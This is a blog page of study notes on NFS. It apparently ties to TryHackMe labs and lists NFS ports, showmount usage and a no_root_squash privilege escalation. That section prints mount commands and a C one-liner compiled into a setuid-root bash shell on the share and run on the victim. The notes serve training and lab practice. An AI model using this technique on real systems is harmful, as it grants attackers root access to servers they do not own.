Skip to main content

NFS: Notes

NFS - Source: https://www.mayagraphics.gr/images/upload/Works122-lo20-8587413302009850261-s1.jpg

NFS - Network File System

To allow NFS traffic throught a firewall these ports need to be open:

  • NFS Daemon (NFSD): Runs on NFS servers and uses port 2049 for both TCP and UDP
  • Portmapper: Uses port 111 for both TCP and UDP
  • Mount daemon (mountd): Uses port 20048, which is specified in /etc/services

Show mounts on remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$

On attack machine

# mkdir /tmp/nfs

# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#

# apt install nfs-common
# service rpcbind restart
# service statd start

# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported

apt install nfs-common nfs4-acl-tools

root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#

# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On NFS server (victim) machine

$ /tmp/x
#

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikepedia

Practice

>>> THM | Network Services 2

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal

Labels:

Popular posts from this blog

Hydra: Notes

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Read more

Free Software Foundation

Richard Stallman founded the Free Software Foundation in 1985 to support the free software movement, promoting the universal freedom to study, distribute, create and modify computer software.
Read more